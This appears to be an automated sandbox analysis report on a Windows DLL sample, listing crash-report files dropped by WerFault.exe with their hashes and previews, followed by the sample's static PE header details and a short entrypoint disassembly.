                                                                                                      Entropy (8bit):3.695750618505511
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rrl7r3GLNi3o6y6YYL6DscgmfTP1SBCpr289bqNsfPOm:RrlsNiY6y6YU6DscgmfTdSWqGfP
                                                                                                      MD5:470C1E96BEE156A062DDE62D8435D310
                                                                                                      SHA1:89C617EF3C62ECA7228B3161C3D598227DEEBB27
                                                                                                      SHA-256:D14C4BB23C64B668D544B0FFB33C6C184CDAF9F48A04558EA4018C81F961D24C
                                                                                                      SHA-512:7EE5AFCD1B1B31E0464AFB5454F09AD769D7180B8B83019238E05E3EA32968BAD1D77FB97326A389C51FFFDEA5C663EA1B16CA0FC60C1695A4EB3C3696BA8C36
                                                                                                      Malicious:false
                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.9.2.<./.P.i.d.>.......
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER28E2.tmp.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4679
                                                                                                      Entropy (8bit):4.510297553914381
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwSD8zsWJgtWI9WorWSC8B68fm8M4JCdsrZF2+q8/3U14SrSid:uITfsZJSNRJpCv1DWid
                                                                                                      MD5:3CB9BF8336F79A1243614ACDCB7B901D
                                                                                                      SHA1:9F59777788190EE43E91A9056E44A205A07098B2
                                                                                                      SHA-256:FB259A95651A8222A525D7DA15E4C0C4B9828EACAC54BA8957D99B562C558804
                                                                                                      SHA-512:9FB654627FFC7BDA053E9C27E8AEE248AAE3656BE3360BDB870DF2BDE2EA9EFC6F45A372000AC5DEF446DDA262E61503099F143BC533AAAF1DE5B659815B901F
                                                                                                      Malicious:false
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975717" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A78.tmp.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4770
                                                                                                      Entropy (8bit):4.486548222415271
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwSD8zsWJgtWI9WorWSC8BW8fm8M4JCds0MFu+q8vjs0p4SrSXd:uITfsZJSNxJyvKtpDWXd
                                                                                                      MD5:9F86FC9C535E79F32537AFEB7432AE5E
                                                                                                      SHA1:FA337B5D24A5151260E108F8D7EC07BB7FF4EEAF
                                                                                                      SHA-256:D2917708CF408C4C9ECC26E60C48D151EF2BD1CB271BDED2DEEAAFE74B45184D
                                                                                                      SHA-512:99888571E3D7EBF6440795209174B61A172279747F35BFF09B151E12FB18C6007410D0C7507A5ABB06F030E1AA10659A7589869B726017FBD0BE4C1E27E0DF41
                                                                                                      Malicious:false
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975717" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E9F.tmp.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4665
                                                                                                      Entropy (8bit):4.474115912012678
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwSD8zsWJgtWI9WorWSC8BNs8fm8M4JCdspN4nsFn+q8/0NGgRZ4SrSVMd:uITfsZJSNRJrN4GbNGmDWVMd
                                                                                                      MD5:5F34BADDF704E0C19ED61E95A50164B2
                                                                                                      SHA1:831A553F2D51811CF929EEBD57B71CC012909D8B
                                                                                                      SHA-256:A9C3BD9F857F8BA8AD740E1C32ED904A7A72A475DA1BE76DD208F7BEFD721573
                                                                                                      SHA-512:09A41A36B98075679FAE50F5007E43F1A3393B7046DFE4E5DE3F322775EC1376658B851189C93F597856D5D995D372CCD7A6591FBDEAD9A1CC2F87CAACAA9050
                                                                                                      Malicious:false
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975717" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C34.tmp.WERInternalMetadata.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8380
                                                                                                      Entropy (8bit):3.6895608569089764
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rrl7r3GLNiB96V46YY26Dscgmf8PHSqCpBd89bK/sfNum:RrlsNir6K6YR6Dscgmf8fSqKkf9
                                                                                                      MD5:D0D48E867190FEF33C4EC93599EE7236
                                                                                                      SHA1:1ED0223B64CAC7416EF012A7DC737A347748ED3B
                                                                                                      SHA-256:93BA0C3504952309EBD3E828BC44125A251B2DB160ACB48D681C62A1445E1544
                                                                                                      SHA-512:128D722D362084D4727205B0AD99964449F380C4F75C2FE98EBB232EA742005317738B220A3EA8C81986E4F82CA17B6E64BC2A4BB4ACCC175086C3DAAE8C1DD4
                                                                                                      Malicious:false
                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.0.0.<./.P.i.d.>.......
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA3C.tmp.dmp
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed May 5 04:46:32 2021, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):39784
                                                                                                      Entropy (8bit):2.512658691380758
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:AFH/L6Sq9rwV2zGXtPOcTocwMM7NPJeE46YX8zlr6nAk:iTS9rwVtbdSxeD6Q8zl2Ak
                                                                                                      MD5:F1B20BA22EC2FE38048280D950EDCE82
                                                                                                      SHA1:1E3B2955A9E560EE97182E617C89F63C08C11F4B
                                                                                                      SHA-256:16D1BD28E4333671A7A421DF747354FA88D2CD012C890B7AB0090A06CCA2AC6E
                                                                                                      SHA-512:170F90B1B3CE74E3EB51DECAE33A5BC55BDC4E70DFFE3AEA33F4D4474318FB8B349FA052BF2AF588C77408B799CAAF7D24E099E5AD26AB397CAD78F7451411A8
                                                                                                      Malicious:false
                                                                                                      Preview: MDMP....... .......(#.`...................U...........B......P ......GenuineIntelW...........T............".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9A.tmp.dmp
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed May 5 04:46:32 2021, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):46196
                                                                                                      Entropy (8bit):2.216521304178328
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:59IK6GUHevqBZyY8S9eMDB0mWt2dGogDAy1/au2n/w65:5yrvsqBZyY8Sp90j2dGb1OI65
                                                                                                      MD5:E2C483FCC5CD117D788E226ED78ABB25
                                                                                                      SHA1:04687084B826DCA42AF99E69595914B54DC171F9
                                                                                                      SHA-256:7040A60F327DEC3968C136C04F1F813D4FF820FBB1D7B6003CB62894A95BEAAE
                                                                                                      SHA-512:B42ECDFB25CB1EB037C06A065A3D49C6E249E623C1432E3CAFBDCEC0769ED5913C0F950F6A7EAB1DE1987753443024FBFAE46220B93575C5F1AB2526569D1A17
                                                                                                      Malicious:false
                                                                                                      Preview: MDMP....... .......(#.`...................U...........B....... ......GenuineIntelW...........T.......t....".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC9E.tmp.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4766
                                                                                                      Entropy (8bit):4.458124164007583
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwSD8zstJgtWI9WorWSC8B08fm8M4JCdspN4fFSI+q8vjspN424SrSyd:uITfHZJSNPJrN4JK6N42DWyd
                                                                                                      MD5:61A3B9E9244E5ADB693EF83182A97244
                                                                                                      SHA1:327C01A90273B9050DB2C746A0C0A8924D7C17ED
                                                                                                      SHA-256:09AF9862375B99D07C49E333BE55C892EF134AD5BB9C841415F861193CBFFE46
                                                                                                      SHA-512:B79FC224A54751BC5129F6A2F58091EF1138661366534B81DBBAC1C3A86E7D368767E2016026D1468C3DE8A6A12BBA54CA12ADCB8AFAB12E0A6D3D99177B6C27
                                                                                                      Malicious:false
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD297.tmp.dmp
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed May 5 04:45:09 2021, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):38640
                                                                                                      Entropy (8bit):2.560424035051431
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:fQaDDzd0HEhAQX5B7+s0MbocTocwMM7NPJe6et5zhcC7ezna:nbGQX5B7gsRdSxevzhma
                                                                                                      MD5:1F94E0357AE69E7BF1C8316AE7B079B6
                                                                                                      SHA1:2E71C1751BE1E5C8424CC8C0C3740037871D18B3
                                                                                                      SHA-256:ED5B9F848DFC048A23D0DD2D19C73F983C9508464ACCD3339462D39674909330
                                                                                                      SHA-512:BF105E7EEC06E47A72BE6703260C762438F9344AFB8831637ADD6AD6B1E424EEBEC1946AFC2773B26CB84F921A689C50AA6710AABA99FD3B0E72783D1ACC2F1D
                                                                                                      Malicious:false
                                                                                                      Preview: MDMP....... ........".`...................U...........B......P ......GenuineIntelW...........T............".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERDAA6.tmp.dmp
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 15 streams, Wed May 5 04:45:46 2021, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):47604
                                                                                                      Entropy (8bit):2.380802761970886
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:NOR2hQ9V50u04DGX8smXQZZM6zwV9kp/uBU+nLujdGe:E5S1mkZMwp2Ue6f
                                                                                                      MD5:E2A7589DFC0C956D519D7CDA94EF8900
                                                                                                      SHA1:40D4B4B4D783AB9566562C6B581722E31F9DA776
                                                                                                      SHA-256:D7A3A4EF2CE2A1C25ECAF78882224BB4B655051B3910BB5FCCB48C82B38EB92D
                                                                                                      SHA-512:77EEDF7251133BD5AABEF84C434C40F8F6D1D52C646F3BC6A7EBEF4BE761F3D7CA3023EE5D0EFDF4A8B8C15F862FA5836E8CC5B0DAE61492FFD8C211795D5FCD
                                                                                                      Malicious:false
                                                                                                      Preview: MDMP....... ........".`...................U...........B......."......GenuineIntelW...........T............".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB33.tmp.WERInternalMetadata.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8308
                                                                                                      Entropy (8bit):3.700743413389048
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rrl7r3GLNiCD69a6Y5G6czgmfTHPSXPCprT89b/fsfCVm:RrlsNie6Q6YY6czgmfTHPST/Ef5
                                                                                                      MD5:64FC71E88C6C88DC7A6BCE356C3EECDD
                                                                                                      SHA1:14CEC9501131E4BF711ACC12F76D3F0291DF0F68
                                                                                                      SHA-256:2FA10800B23975ACD6348CD3CD10D45B6C85C1C022C956816AC410EA9818B604
                                                                                                      SHA-512:ACE2A3F524FCF5D125745FAC94C7AB0EEB7C25FC8BC546A48771B68641AEEF2E679B0D6831D3CCD98A84F542B1CA0D64328E540D7F3FA34BFBBB48C76AC536FF
                                                                                                      Malicious:false
                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.8.<./.P.i.d.>.......
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEDE.tmp.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4679
                                                                                                      Entropy (8bit):4.511228149576569
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwSD8zsEJgtWI9WorWSC8BU8fm8M4JCdsrZF1hXP+q8/3UYTK4SrS8ad:uITfCZJSN/JpBlPvYGDW/d
                                                                                                      MD5:5432E39FD66DC753FD3F44CA058D0A51
                                                                                                      SHA1:70FB355F21179D604E91E7A4CAF8011E16DBA733
                                                                                                      SHA-256:74709CE080DFEDD9738E984D6A656796BB24831B19711E172F4165EBE9E822D1
                                                                                                      SHA-512:BCBA04250937DF23115E4572ED746EC16777BE8B417C7F60EE2A6E1F1B3AC45FFB0A0D84D514FF8DAA17FC4310DFB96AA6F4B0BA2996EC888EC0BE5C6996E134
                                                                                                      Malicious:false
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975715" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.536021869806777
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:3c271eae_by_Libranalysis.dll
                                                                                                      File size:164864
                                                                                                      MD5:3c271eae5a3a2817cfd8704f75fdf405
                                                                                                      SHA1:03b821b5d8b5416900245a05fce8541a21b6da7c
                                                                                                      SHA256:dbd00287fe0c78430fee81ec6333b9c9b1863b7c62ac305de627ce6ca9fb314e
                                                                                                      SHA512:163821fc746739988241c8c39cde90bd479bece8d27df80916edc990957bcbf709f168de2d23704c2d01f9cfe011d4e2dd04f755834e43a423f37ff199d6497b
                                                                                                      SSDEEP:3072:sk2X+QFg3UutDvUvoU8pz6EJEEhu6Tzace9kuaGA81/YXKHML/Yp8AF:yG3rUvoU4JE/Wzan9T7B/CKsL/Yy
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.%.0zK.0zK.0zK.0zJ.}{K...3..{K.....P{K...3..zK.V....zK...1..{K......zK.Rich0zK.........................................PE..L..

                                                                                                      File Icon

                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x100241a0
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x10000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x60903ADD [Mon May 3 18:03:09 2021 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f108efab351dd21acb187c36805c5bbe

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      mov edx, eax
                                                                                                      xor eax, eax
                                                                                                      add eax, 00002233h
                                                                                                      cmpss xmm1, xmm2, 03h
                                                                                                      sub eax, 00002233h
                                                                                                      mov edx, 00000000h
                                                                                                      mov edx, 00000000h
                                                                                                      mov edx, 00000000h
                                                                                                      mov edx, 00000000h
                                                                                                      mov edx, 00000000h
                                                                                                      mov edx, 00000000h
                                                                                                      cmpss xmm1, xmm2, 03h
                                                                                                      cmp eax, 01h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h
                                                                                                      mov eax, 00000000h

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [RES] VS2012 UPD3 build 60610
                                                                                                      • [LNK] VS2005 build 50727
                                                                                                      • [EXP] VS2005 build 50727
                                                                                                      • [ C ] VS2012 UPD4 build 61030
                                                                                                      • [IMP] VS2013 UPD2 build 30501

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x277300x55.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x278040x59.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x3a0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d0000x1220
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x100180x38.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x250000x60.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
